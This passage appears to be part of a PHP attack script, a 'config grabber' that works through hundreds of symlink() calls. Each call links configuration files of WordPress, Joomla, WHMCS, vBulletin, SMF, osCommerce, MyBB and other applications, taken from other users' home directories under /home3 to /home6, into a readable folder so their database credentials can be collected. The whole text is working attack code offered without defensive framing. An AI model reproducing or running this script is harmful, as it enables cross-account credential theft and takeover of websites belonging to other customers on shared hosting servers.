symlink('/home3/'.$user.'/public_html/home/wp-config.php',$kola.' ~~ home - Wordpress.txt');
symlink('/home3/'.$user.'/public_html/portal/wp-config.php',$kola.' ~~ portal - Wordpres.txt');
symlink('/home3/'.$user.'/public_html/site/wp-config.php',$kola.' ~~ site - Wordpress.txt');
symlink('/home3/'.$user.'/public_html/main/wp-config.php',$kola.' ~~ main - Wordpress.txt');
symlink('/home3/'.$user.'/public_html/test/wp-config.php',$kola.' ~~ test - Wordpress.txt');
symlink('/home3/'.$user.'/public_html/SSI.php',$kola.' ~~ C M F .txt') ; 
symlink('/home3/'.$user.'/public_html/forum/SSI.php',$kola.' ~~ forum - C M F .txt') ; 
symlink('/home3/'.$user.'/public_html/system/sistem.php',$kola.' ~~ Lokomedia.txt'); 
symlink('/home3/'.$user.'/public_html/mk_conf.php',$kola.' ~~ mk-portale1.txt');
symlink('/home3/'.$user.'/public_html/includes/functions.php',$kola.' ~~ hpbb3.txt');
symlink('/home3/'.$user.'/public_html/include/db.php',$kola.' ~~ infinity.txt');
symlink('/home3/'.$user.'/public_html/conf_global.php',$kola.' ~~ invisio.txt');
symlink('/home3/'.$user.'/public_html/admin/config.php',$kola.' ~~ admin - OpenCart-4.txt') ;
symlink('/home4/'.$user.'/public_html/beta/configuration.php',$kola.' ~~ beta - Joomla.txt') ; 
symlink('/home4/'.$user.'/public_html/configuration.php',$kola.' ~~ joomla.txt') ; 
symlink('/home4/'.$user.'/public_html/includes/config.php',$kola.' ~~ vBulletin-2.txt') ; 
symlink('/home4/'.$user.'/public_html/home/configuration.php',$kola.' ~~ home - Joomla.txt') ;
symlink('/home4/'.$user.'/public_html/store/configuration.php',$kola.' ~~ store - Joomla.txt') ;
symlink('/home4/'.$user.'/public_html/joomla/configuration.php',$kola.' ~~ joomla - Joomla.txt');
symlink('/home4/'.$user.'/public_html/portal/configuration.php',$kola.' ~~ portal - Joomla.txt');
symlink('/home4/'.$user.'/public_html/joom/configuration.php',$kola.' ~~ joom - Joomla.txt');
symlink('/home4/'.$user.'/public_html/joo/configuration.php',$kola.' ~~ jom - Joomla.txt');
symlink('/home4/'.$user.'/public_html/cms/configuration.php',$kola.' ~~ cms - Joomla.txt');
symlink('/home4/'.$user.'/public_html/site/configuration.php',$kola.' ~~ site - Joomla.txt');
symlink('/home4/'.$user.'/public_html/main/configuration.php',$kola.' ~~ main - Joomla.txt');
symlink('/home4/'.$user.'/public_html/news/configuration.php',$kola.' ~~ news - Joomla.txt');
symlink('/home4/'.$user.'/public_html/new/configuration.php',$kola.' ~~ new - Joomla.txt');
symlink('/home4/'.$user.'/public_html/home/configuration.php',$kola.' ~~ home - Joomla.txt');
symlink('/home4/'.$user.'/public_html/test/configuration.php',$kola.' ~~ test - Joomla.txt');
symlink('/home4/'.$user.'/public_html/myshop/configuration.php',$kola.' ~~ myshop - Joomla.txt'); 
symlink('/home4/'.$user.'/public_html/Settings.php',$kola.' ~~ Smf.txt'); 
symlink('/home4/'.$user.'/public_html/smf/Settings.php',$kola.' ~~ smf - Smf.txt'); 
symlink('/home4/'.$user.'/public_html/forum/Settings.php',$kola.' ~~ forum - Smf.txt'); 
symlink('/home4/'.$user.'/public_html/forums/Settings.php',$kola.' ~~ forums - Smf.txt'); 
symlink('/home4/'.$user.'/public_html/sites/default/settings.php',$kola.' ~~ sites - default - configuration 3.txt');
symlink('/home4/'.$user.'/public_html/includes/dist-configure.php',$kola.' ~~ Zencart.txt'); 
symlink('/home4/'.$user.'/public_html/zencart/includes/dist-configure.php',$kola.' ~~ zencart - zencart.txt'); 
symlink('/home4/'.$user.'/public_html/shop/includes/dist-configure.php',$kola.' ~~ shop - zencart.txt'); 
symlink('/home4/'.$user.'/public_html/includes/configure.php',$kola.' ~~ Oscommerce.txt');
symlink('/home4/'.$user.'/public_html/oscommerce/includes/configure.php',$kola.' ~~ oscommerce - Oscommerce.txt');
symlink('/home4/'.$user.'/public_html/oscommerces/includes/configure.php',$kola.' ~~ oscommerces -Oscommerces.txt');
symlink('/home4/'.$user.'/public_html/shopping/includes/configure.php',$kola.' ~~ shopping - Shopping.txt');
symlink('/home4/'.$user.'/public_html/sale/includes/configure.php',$kola.' ~~ sale - Oscommerce.txt');
symlink('/home4/'.$user.'/public_html/store/includes/configure.php',$kola.' ~~ store - Oscommerce.txt');
symlink('/home4/'.$user.'/public_html/inc/config.php',$kola.' ~~ MyBB.txt') ;
symlink('/home4/'.$user.'/public_html/forum/inc/config.php',$kola.' ~~ forum - MyBB .txt') ;
symlink('/home4/'.$user.'/public_html/lib/config.php',$kola.' ~~ Balitbang.txt') ; 
symlink('/home4/'.$user.'/public_html/cc/includes/config.php',$kola.' ~~ VBulletin4.txt');
symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$kola.' ~~ forum - vBulletin.txt');
symlink('/home4/'.$user.'/public_html/forum/config.php',$kola.' ~~ forum - PhpBB.txt') ;
symlink('/home4/'.$user.'/public_html/amember/config.inc.php',$kola.' ~~ Amember.txt');
symlink('/home4/'.$user.'/public_html/config.inc.php',$kola.' ~~ Amember2.txt');
symlink('/home4/'.$user.'/public_html/vb/includes/config.php',$kola.' ~~ Vb.txt');
symlink('/home4/'.$user.'/public_html/vb3/includes/config.php',$kola.' ~~ Vb3.txt');
symlink('/home4/'.$user.'/public_html/upload/includes/config.php',$kola.' ~~ Upload.txt');
symlink('/home4/'.$user.'/public_html/incl/config.php',$kola.' ~~ Malay.txt');
symlink('/home4/'.$user.'/public_html/config/koneksi.php',$kola.' ~~ Lokomedia.txt');
symlink('/home4/'.$user.'/public_html/config/config.php',$kola.' ~~ Lokomedia.txt');
symlink('/home4/'.$user.'/public_html/datas/config.php',$kola.' ~~ datas - configuration 3.txt');
symlink('/home4/'.$user.'/public_html/forum/conf/config.php',$kola.' ~~ forum - Other-1.txt') ; 
symlink('/home4/'.$user.'/public_html/include/config.php',$kola.' ~~ Other-2.txt');
symlink('/home4/'.$user.'/public_html/config.php',$kola.' ~~ Other-3.txt') ;
symlink('/home4/'.$user.'/public_html/admin/conf.php',$kola.' ~~ admin - Other-4.txt');
symlink('/home4/'.$user.'/public_html/connect.php',$kola.' ~~ Other-5.txt');
symlink('/home4/'.$user.'/public_html/codelibrary/inc/variables.php',$kola.' ~~ Other-6.txt') ;
symlink('/home4/'.$user.'/public_html/client/configuration.php',$kola.' ~~ client - admin Whm1.txt') ; 
symlink('/home4/'.$user.'/public_html/clients/configuration.php',$kola.' ~~ clients - Whm2.txt') ; 
symlink('/home4/'.$user.'/public_html/billing/configuration.php',$kola.' ~~ billing - Whm3.txt') ; 
symlink('/home4/'.$user.'/public_html/billings/configuration.php',$kola.' ~~ Whm4.txt') ;
symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$kola.' ~~ whmcs - Whm5.txt') ; 
symlink('/home4/'.$user.'/public_html/whm/configuration.php',$kola.' ~~ whm - Whm6.txt');
symlink('/home4/'.$user.'/public_html/order/configuration.php',$kola.' ~~ order - Whm7.txt');
symlink('/home4/'.$user.'/public_html/whmc/configuration.php',$kola.' ~~ whmc - Whm8.txt');
symlink('/home4/'.$user.'/public_html/submitticket.php',$kola.' ~~ whm9.txt');
symlink('/home4/'.$user.'/public_html/manage/configuration.php',$kola.' ~~ manage -Whm10.txt'); 
symlink('/home4/'.$user.'/public_html/clientes/configuration.php',$kola.' ~~ clientes - Whm11.txt');
symlink('/home4/'.$user.'/public_html/cliente/configuration.php',$kola.' ~~ cliente - Whm12txt');
symlink('/home4/'.$user.'/public_html/clientsupport/configuration.php',$kola.' ~~ clientsupport - Whm13.txt');
symlink('/home4/'.$user.'/public_html/support/configuration.php',$kola.' ~~ support - Whm13.txt');
symlink('/home4/'.$user.'/public_html/supports/configuration.php',$kola.' ~~ supports - Whm14.txt');
symlink('/home4/'.$user.'/public_html/cpanel/configuration.php',$kola.' ~~ cpanel - Whm15');
symlink('/home4/'.$user.'/public_html/panel/configuration.php',$kola.' ~~ panel - Whm16');
symlink('/home4/'.$user.'/public_html/host/configuration.php',$kola.' ~~ host - Whm17');
symlink('/home4/'.$user.'/public_html/hosting/configuration.php',$kola.' ~~ hosting - Whm18');
symlink('/home4/'.$user.'/public_html/hosts/configuration.php',$kola.' ~~ hosts - Whm19');
symlink('/home4/'.$user.'/public_html/v1/configuration.php',$kola.' ~~ v1 - Whm20');
symlink('/home4/'.$user.'/public_html/v2/configuration.php',$kola.' ~~ v2 - Whm21');
symlink('/home4/'.$user.'/public_html/baru/configuration.php',$kola.' ~~ v2 - Whm22');
symlink('/home4/'.$user.'/public_html/wp-config.php',$kola.' ~~ Wordpress.txt') ; 
symlink('/home4/'.$user.'/public_html/blog/wp-config.php',$kola.' ~~ Wordpress.txt') ; 
symlink('/home4/'.$user.'/public_html/Connections/cms_blog.php',$kola.' ~~ admin - cms_blog.txt') ; 
symlink('/home4/'.$user.'/public_html/web/wp-config.php',$kola.' ~~ web - Wordpress .txt') ; 
symlink('/home4/'.$user.'/public_html/welcome/wp-config.php',$kola.' ~~ welcome - Wordpress .txt') ; 
symlink('/home4/'.$user.'/public_html/store/wp-config.php',$kola.' ~~ store - Wordpress .txt') ; 
symlink('/home4/'.$user.'/public_html/wp/wp-config.php',$kola.' ~~ wp - Wordpress.txt');
symlink('/home4/'.$user.'/public_html/wp/beta/wp-config.php',$kola.' ~~ wp - beta - Wordpress.txt');
symlink('/home4/'.$user.'/public_html/beta/wp-config.php',$kola.' ~~ beta - Wordpress.txt');
symlink('/home4/'.$user.'/public_html/press/wp-config.php',$kola.' ~~ press - Wp13.txt');
symlink('/home4/'.$user.'/public_html/wordpress/wp-config.php',$kola.' ~~ wordpress - Wordpress.txt');
symlink('/home4/'.$user.'/public_html/wordpress/beta/wp-config.php',$kola.' ~~ wordpress - beta - Wordpress.txt');
symlink('/home4/'.$user.'/public_html/news/wp-config.php',$kola.' ~~ news - Wordpress.txt');
symlink('/home4/'.$user.'/public_html/new/wp-config.php',$kola.' ~~ new - Wordpress.txt');
symlink('/home4/'.$user.'/public_html/blogs/wp-config.php',$kola.' ~~ blog - Wordpress.txt');
symlink('/home4/'.$user.'/public_html/home/wp-config.php',$kola.' ~~ home - Wordpress.txt');
symlink('/home4/'.$user.'/public_html/portal/wp-config.php',$kola.' ~~ portal - Wordpres.txt');
symlink('/home4/'.$user.'/public_html/site/wp-config.php',$kola.' ~~ site - Wordpress.txt');
symlink('/home4/'.$user.'/public_html/main/wp-config.php',$kola.' ~~ main - Wordpress.txt');
symlink('/home4/'.$user.'/public_html/test/wp-config.php',$kola.' ~~ test - Wordpress.txt');
symlink('/home4/'.$user.'/public_html/SSI.php',$kola.' ~~ C M F .txt') ; 
symlink('/home4/'.$user.'/public_html/forum/SSI.php',$kola.' ~~ forum - C M F .txt') ; 
symlink('/home4/'.$user.'/public_html/system/sistem.php',$kola.' ~~ Lokomedia.txt'); 
symlink('/home4/'.$user.'/public_html/mk_conf.php',$kola.' ~~ mk-portale1.txt');
symlink('/home4/'.$user.'/public_html/includes/functions.php',$kola.' ~~ hpbb3.txt');
symlink('/home4/'.$user.'/public_html/include/db.php',$kola.' ~~ infinity.txt');
symlink('/home4/'.$user.'/public_html/conf_global.php',$kola.' ~~ invisio.txt');
symlink('/home4/'.$user.'/public_html/admin/config.php',$kola.' ~~ admin - OpenCart-4.txt') ;
symlink('/home5/'.$user.'/public_html/beta/configuration.php',$kola.' ~~ beta - Joomla.txt') ; 
symlink('/home5/'.$user.'/public_html/configuration.php',$kola.' ~~ joomla.txt') ; 
symlink('/home5/'.$user.'/public_html/includes/config.php',$kola.' ~~ vBulletin-2.txt') ; 
symlink('/home5/'.$user.'/public_html/home/configuration.php',$kola.' ~~ home - Joomla.txt') ;
symlink('/home5/'.$user.'/public_html/store/configuration.php',$kola.' ~~ store - Joomla.txt') ;
symlink('/home5/'.$user.'/public_html/joomla/configuration.php',$kola.' ~~ joomla - Joomla.txt');
symlink('/home5/'.$user.'/public_html/portal/configuration.php',$kola.' ~~ portal - Joomla.txt');
symlink('/home5/'.$user.'/public_html/joom/configuration.php',$kola.' ~~ joom - Joomla.txt');
symlink('/home5/'.$user.'/public_html/joo/configuration.php',$kola.' ~~ jom - Joomla.txt');
symlink('/home5/'.$user.'/public_html/cms/configuration.php',$kola.' ~~ cms - Joomla.txt');
symlink('/home5/'.$user.'/public_html/site/configuration.php',$kola.' ~~ site - Joomla.txt');
symlink('/home5/'.$user.'/public_html/main/configuration.php',$kola.' ~~ main - Joomla.txt');
symlink('/home5/'.$user.'/public_html/news/configuration.php',$kola.' ~~ news - Joomla.txt');
symlink('/home5/'.$user.'/public_html/new/configuration.php',$kola.' ~~ new - Joomla.txt');
symlink('/home5/'.$user.'/public_html/home/configuration.php',$kola.' ~~ home - Joomla.txt');
symlink('/home5/'.$user.'/public_html/test/configuration.php',$kola.' ~~ test - Joomla.txt');
symlink('/home5/'.$user.'/public_html/myshop/configuration.php',$kola.' ~~ myshop - Joomla.txt'); 
symlink('/home5/'.$user.'/public_html/Settings.php',$kola.' ~~ Smf.txt'); 
symlink('/home5/'.$user.'/public_html/smf/Settings.php',$kola.' ~~ smf - Smf.txt'); 
symlink('/home5/'.$user.'/public_html/forum/Settings.php',$kola.' ~~ forum - Smf.txt'); 
symlink('/home5/'.$user.'/public_html/forums/Settings.php',$kola.' ~~ forums - Smf.txt'); 
symlink('/home5/'.$user.'/public_html/sites/default/settings.php',$kola.' ~~ sites - default - configuration 3.txt');
symlink('/home5/'.$user.'/public_html/includes/dist-configure.php',$kola.' ~~ Zencart.txt'); 
symlink('/home5/'.$user.'/public_html/zencart/includes/dist-configure.php',$kola.' ~~ zencart - zencart.txt'); 
symlink('/home5/'.$user.'/public_html/shop/includes/dist-configure.php',$kola.' ~~ shop - zencart.txt'); 
symlink('/home5/'.$user.'/public_html/includes/configure.php',$kola.' ~~ Oscommerce.txt');
symlink('/home5/'.$user.'/public_html/oscommerce/includes/configure.php',$kola.' ~~ oscommerce - Oscommerce.txt');
symlink('/home5/'.$user.'/public_html/oscommerces/includes/configure.php',$kola.' ~~ oscommerces -Oscommerces.txt');
symlink('/home5/'.$user.'/public_html/shopping/includes/configure.php',$kola.' ~~ shopping - Shopping.txt');
symlink('/home5/'.$user.'/public_html/sale/includes/configure.php',$kola.' ~~ sale - Oscommerce.txt');
symlink('/home5/'.$user.'/public_html/store/includes/configure.php',$kola.' ~~ store - Oscommerce.txt');
symlink('/home5/'.$user.'/public_html/inc/config.php',$kola.' ~~ MyBB.txt') ;
symlink('/home5/'.$user.'/public_html/forum/inc/config.php',$kola.' ~~ forum - MyBB .txt') ;
symlink('/home5/'.$user.'/public_html/lib/config.php',$kola.' ~~ Balitbang.txt') ; 
symlink('/home5/'.$user.'/public_html/cc/includes/config.php',$kola.' ~~ VBulletin4.txt');
symlink('/home5/'.$user.'/public_html/forum/includes/config.php',$kola.' ~~ forum - vBulletin.txt');
symlink('/home5/'.$user.'/public_html/forum/config.php',$kola.' ~~ forum - PhpBB.txt') ;
symlink('/home5/'.$user.'/public_html/amember/config.inc.php',$kola.' ~~ Amember.txt');
symlink('/home5/'.$user.'/public_html/config.inc.php',$kola.' ~~ Amember2.txt');
symlink('/home5/'.$user.'/public_html/vb/includes/config.php',$kola.' ~~ Vb.txt');
symlink('/home5/'.$user.'/public_html/vb3/includes/config.php',$kola.' ~~ Vb3.txt');
symlink('/home5/'.$user.'/public_html/upload/includes/config.php',$kola.' ~~ Upload.txt');
symlink('/home5/'.$user.'/public_html/incl/config.php',$kola.' ~~ Malay.txt');
symlink('/home5/'.$user.'/public_html/config/koneksi.php',$kola.' ~~ Lokomedia.txt');
symlink('/home5/'.$user.'/public_html/config/config.php',$kola.' ~~ config.txt');
symlink('/home5/'.$user.'/public_html/datas/config.php',$kola.' ~~ datas - configuration 3.txt');
symlink('/home5/'.$user.'/public_html/forum/conf/config.php',$kola.' ~~ forum - Other-1.txt') ; 
symlink('/home5/'.$user.'/public_html/include/config.php',$kola.' ~~ Other-2.txt');
symlink('/home5/'.$user.'/public_html/config.php',$kola.' ~~ Other-3.txt') ;
symlink('/home5/'.$user.'/public_html/admin/conf.php',$kola.' ~~ admin - Other-4.txt');
symlink('/home5/'.$user.'/public_html/connect.php',$kola.' ~~ Other-5.txt');
symlink('/home5/'.$user.'/public_html/codelibrary/inc/variables.php',$kola.' ~~ Other-6.txt') ;
symlink('/home5/'.$user.'/public_html/client/configuration.php',$kola.' ~~ client - admin Whm1.txt') ; 
symlink('/home5/'.$user.'/public_html/clients/configuration.php',$kola.' ~~ clients - Whm2.txt') ; 
symlink('/home5/'.$user.'/public_html/billing/configuration.php',$kola.' ~~ billing - Whm3.txt') ; 
symlink('/home5/'.$user.'/public_html/billings/configuration.php',$kola.' ~~ Whm4.txt') ;
symlink('/home5/'.$user.'/public_html/whmcs/configuration.php',$kola.' ~~ whmcs - Whm5.txt') ; 
symlink('/home5/'.$user.'/public_html/whm/configuration.php',$kola.' ~~ whm - Whm6.txt');
symlink('/home5/'.$user.'/public_html/order/configuration.php',$kola.' ~~ order - Whm7.txt');
symlink('/home5/'.$user.'/public_html/whmc/configuration.php',$kola.' ~~ whmc - Whm8.txt');
symlink('/home5/'.$user.'/public_html/submitticket.php',$kola.' ~~ whm9.txt');
symlink('/home5/'.$user.'/public_html/manage/configuration.php',$kola.' ~~ manage -Whm10.txt'); 
symlink('/home5/'.$user.'/public_html/clientes/configuration.php',$kola.' ~~ clientes - Whm11.txt');
symlink('/home5/'.$user.'/public_html/cliente/configuration.php',$kola.' ~~ cliente - Whm12txt');
symlink('/home5/'.$user.'/public_html/clientsupport/configuration.php',$kola.' ~~ clientsupport - Whm13.txt');
symlink('/home5/'.$user.'/public_html/support/configuration.php',$kola.' ~~ support - Whm13.txt');
symlink('/home5/'.$user.'/public_html/supports/configuration.php',$kola.' ~~ supports - Whm14.txt');
symlink('/home5/'.$user.'/public_html/cpanel/configuration.php',$kola.' ~~ cpanel - Whm15');
symlink('/home5/'.$user.'/public_html/panel/configuration.php',$kola.' ~~ panel - Whm16');
symlink('/home5/'.$user.'/public_html/host/configuration.php',$kola.' ~~ host - Whm17');
symlink('/home5/'.$user.'/public_html/hosting/configuration.php',$kola.' ~~ hosting - Whm18');
symlink('/home5/'.$user.'/public_html/hosts/configuration.php',$kola.' ~~ hosts - Whm19');
symlink('/home5/'.$user.'/public_html/v1/configuration.php',$kola.' ~~ v1 - Whm20');
symlink('/home5/'.$user.'/public_html/v2/configuration.php',$kola.' ~~ v2 - Whm21');
symlink('/home5/'.$user.'/public_html/baru/configuration.php',$kola.' ~~ v2 - Whm22');
symlink('/home5/'.$user.'/public_html/wp-config.php',$kola.' ~~ Wordpress.txt') ; 
symlink('/home5/'.$user.'/public_html/blog/wp-config.php',$kola.' ~~ Wordpress.txt') ; 
symlink('/home5/'.$user.'/public_html/Connections/cms_blog.php',$kola.' ~~ admin - cms_blog.txt') ; 
symlink('/home5/'.$user.'/public_html/web/wp-config.php',$kola.' ~~ web - Wordpress .txt') ; 
symlink('/home5/'.$user.'/public_html/welcome/wp-config.php',$kola.' ~~ welcome - Wordpress .txt') ; 
symlink('/home5/'.$user.'/public_html/store/wp-config.php',$kola.' ~~ store - Wordpress .txt') ; 
symlink('/home5/'.$user.'/public_html/wp/wp-config.php',$kola.' ~~ wp - Wordpress.txt');
symlink('/home5/'.$user.'/public_html/wp/beta/wp-config.php',$kola.' ~~ wp - beta - Wordpress.txt');
symlink('/home5/'.$user.'/public_html/beta/wp-config.php',$kola.' ~~ beta - Wordpress.txt');
symlink('/home5/'.$user.'/public_html/press/wp-config.php',$kola.' ~~ press - Wp13.txt');
symlink('/home5/'.$user.'/public_html/wordpress/wp-config.php',$kola.' ~~ wordpress - Wordpress.txt');
symlink('/home5/'.$user.'/public_html/wordpress/beta/wp-config.php',$kola.' ~~ wordpress - beta - Wordpress.txt');
symlink('/home5/'.$user.'/public_html/news/wp-config.php',$kola.' ~~ news - Wordpress.txt');
symlink('/home5/'.$user.'/public_html/new/wp-config.php',$kola.' ~~ new - Wordpress.txt');
symlink('/home5/'.$user.'/public_html/blogs/wp-config.php',$kola.' ~~ blog - Wordpress.txt');
symlink('/home5/'.$user.'/public_html/home/wp-config.php',$kola.' ~~ home - Wordpress.txt');
symlink('/home5/'.$user.'/public_html/portal/wp-config.php',$kola.' ~~ portal - Wordpres.txt');
symlink('/home5/'.$user.'/public_html/site/wp-config.php',$kola.' ~~ site - Wordpress.txt');
symlink('/home5/'.$user.'/public_html/main/wp-config.php',$kola.' ~~ main - Wordpress.txt');
symlink('/home5/'.$user.'/public_html/test/wp-config.php',$kola.' ~~ test - Wordpress.txt');
symlink('/home5/'.$user.'/public_html/SSI.php',$kola.' ~~ C M F .txt') ; 
symlink('/home5/'.$user.'/public_html/forum/SSI.php',$kola.' ~~ forum - C M F .txt') ; 
symlink('/home5/'.$user.'/public_html/system/sistem.php',$kola.' ~~ Lokomedia.txt'); 
symlink('/home5/'.$user.'/public_html/mk_conf.php',$kola.' ~~ mk-portale1.txt');
symlink('/home5/'.$user.'/public_html/includes/functions.php',$kola.' ~~ hpbb3.txt');
symlink('/home5/'.$user.'/public_html/include/db.php',$kola.' ~~ infinity.txt');
symlink('/home5/'.$user.'/public_html/conf_global.php',$kola.' ~~ invisio.txt');
symlink('/home5/'.$user.'/public_html/admin/config.php',$kola.' ~~ admin - OpenCart-4.txt') ;
symlink('/home6/'.$user.'/public_html/beta/configuration.php',$kola.' ~~ beta - Joomla.txt') ; 
symlink('/home6/'.$user.'/public_html/configuration.php',$kola.' ~~ joomla.txt') ; 
symlink('/home6/'.$user.'/public_html/includes/config.php',$kola.' ~~ vBulletin-2.txt') ; 
symlink('/home6/'.$user.'/public_html/home/configuration.php',$kola.' ~~ home - Joomla.txt') ;
symlink('/home6/'.$user.'/public_html/store/configuration.php',$kola.' ~~ store - Joomla.txt') ;
symlink('/home6/'.$user.'/public_html/joomla/configuration.php',$kola.' ~~ joomla - Joomla.txt');
symlink('/home6/'.$user.'/public_html/portal/configuration.php',$kola.' ~~ portal - Joomla.txt');
symlink('/home6/'.$user.'/public_html/joom/configuration.php',$kola.' ~~ joom - Joomla.txt');
symlink('/home6/'.$user.'/public_html/joo/configuration.php',$kola.' ~~ jom - Joomla.txt');
symlink('/home6/'.$user.'/public_html/cms/configuration.php',$kola.' ~~ cms - Joomla.txt');
symlink('/home6/'.$user.'/public_html/site/configuration.php',$kola.' ~~ site - Joomla.txt');
symlink('/home6/'.$user.'/public_html/main/configuration.php',$kola.' ~~ main - Joomla.txt');
symlink('/home6/'.$user.'/public_html/news/configuration.php',$kola.' ~~ news - Joomla.txt');
symlink('/home6/'.$user.'/public_html/new/configuration.php',$kola.' ~~ new - Joomla.txt');
symlink('/home6/'.$user.'/public_html/home/configuration.php',$kola.' ~~ home - Joomla.txt');
symlink('/home6/'.$user.'/public_html/test/configuration.php',$kola.' ~~ test - Joomla.txt');
symlink('/home6/'.$user.'/public_html/myshop/configuration.php',$kola.' ~~ myshop - Joomla.txt'); 
symlink('/home6/'.$user.'/public_html/Settings.php',$kola.' ~~ Smf.txt'); 
symlink('/home6/'.$user.'/public_html/smf/Settings.php',$kola.' ~~ smf - Smf.txt'); 
symlink('/home6/'.$user.'/public_html/forum/Settings.php',$kola.' ~~ forum - Smf.txt'); 
symlink('/home6/'.$user.'/public_html/forums/Settings.php',$kola.' ~~ forums - Smf.txt'); 
symlink('/home6/'.$user.'/public_html/sites/default/settings.php',$kola.' ~~ sites - default - configuration 3.txt');
symlink('/home6/'.$user.'/public_html/includes/dist-configure.php',$kola.' ~~ Zencart.txt'); 
symlink('/home6/'.$user.'/public_html/zencart/includes/dist-configure.php',$kola.' ~~ zencart - zencart.txt'); 
symlink('/home6/'.$user.'/public_html/shop/includes/dist-configure.php',$kola.' ~~ shop - zencart.txt'); 
symlink('/home6/'.$user.'/public_html/includes/configure.php',$kola.' ~~ Oscommerce.txt');
symlink('/home6/'.$user.'/public_html/oscommerce/includes/configure.php',$kola.' ~~ oscommerce - Oscommerce.txt');
symlink('/home6/'.$user.'/public_html/oscommerces/includes/configure.php',$kola.' ~~ oscommerces -Oscommerces.txt');
symlink('/home6/'.$user.'/public_html/shopping/includes/configure.php',$kola.' ~~ shopping - Shopping.txt');
symlink('/home6/'.$user.'/public_html/sale/includes/configure.php',$kola.' ~~ sale - Oscommerce.txt');
symlink('/home6/'.$user.'/public_html/store/includes/configure.php',$kola.' ~~ store - Oscommerce.txt');
symlink('/home6/'.$user.'/public_html/inc/config.php',$kola.' ~~ MyBB.txt') ;
symlink('/home6/'.$user.'/public_html/forum/inc/config.php',$kola.' ~~ forum - MyBB .txt') ;
symlink('/home6/'.$user.'/public_html/lib/config.php',$kola.' ~~ Balitbang.txt') ; 
symlink('/home6/'.$user.'/public_html/cc/includes/config.php',$kola.' ~~ VBulletin4.txt');
symlink('/home6/'.$user.'/public_html/forum/includes/config.php',$kola.' ~~ forum - vBulletin.txt');
symlink('/home6/'.$user.'/public_html/forum/config.php',$kola.' ~~ forum - PhpBB.txt') ;
symlink('/home6/'.$user.'/public_html/amember/config.inc.php',$kola.' ~~ Amember.txt');
symlink('/home6/'.$user.'/public_html/config.inc.php',$kola.' ~~ Amember2.txt');
symlink('/home6/'.$user.'/public_html/vb/includes/config.php',$kola.' ~~ Vb.txt');
symlink('/home6/'.$user.'/public_html/vb3/includes/config.php',$kola.' ~~ Vb3.txt');
symlink('/home6/'.$user.'/public_html/upload/includes/config.php',$kola.' ~~ Upload.txt');
symlink('/home6/'.$user.'/public_html/incl/config.php',$kola.' ~~ Malay.txt');
symlink('/home6/'.$user.'/public_html/config/koneksi.php',$kola.' ~~ Lokomedia.txt');
symlink('/home6/'.$user.'/public_html/config/config.php',$kola.' ~~ config.txt');
symlink('/home6/'.$user.'/public_html/datas/config.php',$kola.' ~~ datas - configuration 3.txt');
symlink('/home6/'.$user.'/public_html/forum/conf/config.php',$kola.' ~~ forum - Other-1.txt') ; 
symlink('/home6/'.$user.'/public_html/include/config.php',$kola.' ~~ Other-2.txt');
symlink('/home6/'.$user.'/public_html/config.php',$kola.' ~~ Other-3.txt') ;
symlink('/home6/'.$user.'/public_html/admin/conf.php',$kola.' ~~ admin - Other-4.txt');
symlink('/home6/'.$user.'/public_html/connect.php',$kola.' ~~ Other-5.txt');
symlink('/home6/'.$user.'/public_html/codelibrary/inc/variables.php',$kola.' ~~ Other-6.txt') ;
symlink('/home6/'.$user.'/public_html/client/configuration.php',$kola.' ~~ client - admin Whm1.txt') ; 
symlink('/home6/'.$user.'/public_html/clients/configuration.php',$kola.' ~~ clients - Whm2.txt') ; 
symlink('/home6/'.$user.'/public_html/billing/configuration.php',$kola.' ~~ billing - Whm3.txt') ; 
symlink('/home6/'.$user.'/public_html/billings/configuration.php',$kola.' ~~ Whm4.txt') ;
symlink('/home6/'.$user.'/public_html/whmcs/configuration.php',$kola.' ~~ whmcs - Whm5.txt') ; 
symlink('/home6/'.$user.'/public_html/whm/configuration.php',$kola.' ~~ whm - Whm6.txt');
symlink('/home6/'.$user.'/public_html/order/configuration.php',$kola.' ~~ order - Whm7.txt');
symlink('/home6/'.$user.'/public_html/whmc/configuration.php',$kola.' ~~ whmc - Whm8.txt');
symlink('/home6/'.$user.'/public_html/submitticket.php',$kola.' ~~ whm9.txt');
symlink('/home6/'.$user.'/public_html/manage/configuration.php',$kola.' ~~ manage -Whm10.txt'); 
symlink('/home6/'.$user.'/public_html/clientes/configuration.php',$kola.' ~~ clientes - Whm11.txt');
symlink('/home6/'.$user.'/public_html/cliente/configuration.php',$kola.' ~~ cliente - Whm12txt');
symlink('/home6/'.$user.'/public_html/clientsupport/configuration.php',$kola.' ~~ clientsupport - Whm13.txt');
symlink('/home6/'.$user.'/public_html/support/configuration.php',$kola.' ~~ support - Whm13.txt');
symlink('/home6/'.$user.'/public_html/supports/configuration.php',$kola.' ~~ supports - Whm14.txt');
symlink('/home6/'.$user.'/public_html/cpanel/configuration.php',$kola.' ~~ cpanel - Whm15');
symlink('/home6/'.$user.'/public_html/panel/configuration.php',$kola.' ~~ panel - Whm16');
symlink('/home6/'.$user.'/public_html/host/configuration.php',$kola.' ~~ host - Whm17');
symlink('/home6/'.$user.'/public_html/hosting/configuration.php',$kola.' ~~ hosting - Whm18');
symlink('/home6/'.$user.'/public_html/hosts/configuration.php',$kola.' ~~ hosts - Whm19');
symlink('/home6/'.$user.'/public_html/v1/configuration.php',$kola.' ~~ v1 - Whm20');
symlink('/home6/'.$user.'/public_html/v2/configuration.php',$kola.' ~~ v2 - Whm21');
symlink('/home6/'.$user.'/public_html/baru/configuration.php',$kola.' ~~ v2 - Whm22');
symlink('/home6/'.$user.'/public_html/wp-config.php',$kola.' ~~ Wordpress.txt') ; 
symlink('/home6/'.$user.'/public_html/blog/wp-config.php',$kola.' ~~ Wordpress.txt') ; 
symlink('/home6/'.$user.'/public_html/Connections/cms_blog.php',$kola.' ~~ admin - cms_blog.txt') ; 
symlink('/home6/'.$user.'/public_html/web/wp-config.php',$kola.' ~~ web - Wordpress .txt') ; 
symlink('/home6/'.$user.'/public_html/welcome/wp-config.php',$kola.' ~~ welcome - Wordpress .txt') ; 
symlink('/home6/'.$user.'/public_html/store/wp-config.php',$kola.' ~~ store - Wordpress .txt') ; 
symlink('/home6/'.$user.'/public_html/wp/wp-config.php',$kola.' ~~ wp - Wordpress.txt');
symlink('/home6/'.$user.'/public_html/wp/beta/wp-config.php',$kola.' ~~ wp - beta - Wordpress.txt');
symlink('/home6/'.$user.'/public_html/beta/wp-config.php',$kola.' ~~ beta - Wordpress.txt');
symlink('/home6/'.$user.'/public_html/press/wp-config.php',$kola.' ~~ press - Wp13.txt');
